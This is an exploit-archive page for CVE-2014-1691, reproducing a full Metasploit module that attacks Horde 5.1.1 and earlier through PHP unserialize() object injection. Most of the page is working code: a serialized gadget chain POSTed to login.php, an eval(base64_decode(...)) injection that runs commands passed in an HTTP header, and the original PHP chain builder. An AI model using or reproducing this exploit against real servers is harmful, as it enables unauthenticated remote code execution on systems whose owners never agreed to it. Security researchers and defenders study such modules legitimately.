Horde Framework Unserialize PHP Code Execution

2014-03-2200:00:00

metasploit

0day.today

0.951 High

EPSS

Percentile

99.1%

JSON

This Metasploit module exploits a php unserialize() vulnerability in Horde versions 5.1.1 and below which could be abused to allow unauthenticated users to execute arbitrary code with the permissions of the web server. The dangerous unserialize() exists in the ‘lib/Horde/Variables.php’ file. The exploit abuses the __destruct() method from the Horde_Kolab_Server_Decorator_Clean class to reach a dangerous call_user_func() call in the Horde_Prefs class.

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Horde Framework Unserialize PHP Code Execution',
      'Description'    => %q{
        This module exploits a php unserialize() vulnerability in Horde <= 5.1.1 which could be
        abused to allow unauthenticated users to execute arbitrary code with the permissions of
        the web server. The dangerous unserialize() exists in the 'lib/Horde/Variables.php' file.
        The exploit abuses the __destruct() method from the Horde_Kolab_Server_Decorator_Clean
        class to reach a dangerous call_user_func() call in the Horde_Prefs class.
      },
      'Author'         =>
        [
          'EgiX', # Exploitation technique and Vulnerability discovery (originally reported by the vendor)
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2014-1691' ],
          [ 'URL', 'http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection' ],
          [ 'URL', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=737149' ],
          [ 'URL', 'https://github.com/horde/horde/commit/da6afc7e9f4e290f782eca9dbca794f772caccb3' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Targets'        => [ ['Horde 5', { }], ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 27 2013'
      ))

      register_options(
        [
          OptString.new('TARGETURI', [ true, "The base path to Horde", "/horde/"])
        ], self.class)
  end

  def check
    flag = rand_text_alpha(rand(10)+20)
    res = send_request_exploit("print #{flag};die;")
    if res and res.body and res.body.to_s =~ /#{flag}/
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    print_status("#{peer} - Testing injection...")
    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, "#{peer} - Target isn't vulnerable, exiting...")
    end

    print_status("#{peer} - Exploiting the unserialize()...")
    send_request_exploit(payload.encoded)
  end

  def send_request_exploit(p)
    php_injection = "eval(base64_decode($_SERVER[HTTP_CMD]));die();"

    payload_serialized = "O:34:\"Horde_Kolab_Server_Decorator_Clean\":2:{s:43:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_server\";"
    payload_serialized << "O:20:\"Horde_Prefs_Identity\":2:{s:9:\"\x00*\x00_prefs\";O:11:\"Horde_Prefs\":2:{s:8:\"\x00*\x00_opts\";a:1:{s:12:\"sizecallback\";"
    payload_serialized << "a:2:{i:0;O:12:\"Horde_Config\":1:{s:13:\"\x00*\x00_oldConfig\";s:#{php_injection.length}:\"#{php_injection}\";}i:1;s:13:\"readXMLConfig\";}}"
    payload_serialized << "s:10:\"\x00*\x00_scopes\";a:1:{s:5:\"horde\";O:17:\"Horde_Prefs_Scope\":1:{s:9:\"\x00*\x00_prefs\";a:1:{i:0;i:1;}}}}"
    payload_serialized << "s:13:\"\x00*\x00_prefnames\";a:1:{s:10:\"identities\";i:0;}}s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}"

    send_request_cgi(
      {
        'uri'       => normalize_uri(target_uri.path.to_s, "login.php"),
        'method'    => 'POST',
        'vars_post' => {
          '_formvars' => payload_serialized
        },
        'headers' => {
          'Cmd' => Rex::Text.encode_base64(p)
        }
      })
  end
end

=begin

PHP chain by EgiX: http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection

class Horde_Config
{
   protected $_oldConfig = "phpinfo();die;";
}

class Horde_Prefs_Scope
{
   protected $_prefs = array(1);
}

class Horde_Prefs
{
   protected $_opts, $_scopes;

   function __construct()
   {
      $this->_opts['sizecallback'] = array(new Horde_Config, 'readXMLConfig');
      $this->_scopes['horde'] = new Horde_Prefs_Scope;
   }
}

class Horde_Prefs_Identity
{
   protected $_prefs, $_prefnames;

   function __construct()
   {
      $this->_prefs = new Horde_Prefs;
      $this->_prefnames['identities'] = 0;
   }
}

class Horde_Kolab_Server_Decorator_Clean
{
   private $_server, $_added = array(1);

   function __construct()
   {
      $this->_server = new Horde_Prefs_Identity;
   }
}

$popchain = serialize(new Horde_Kolab_Server_Decorator_Clean);

=end

#  0day.today [2018-01-09]  #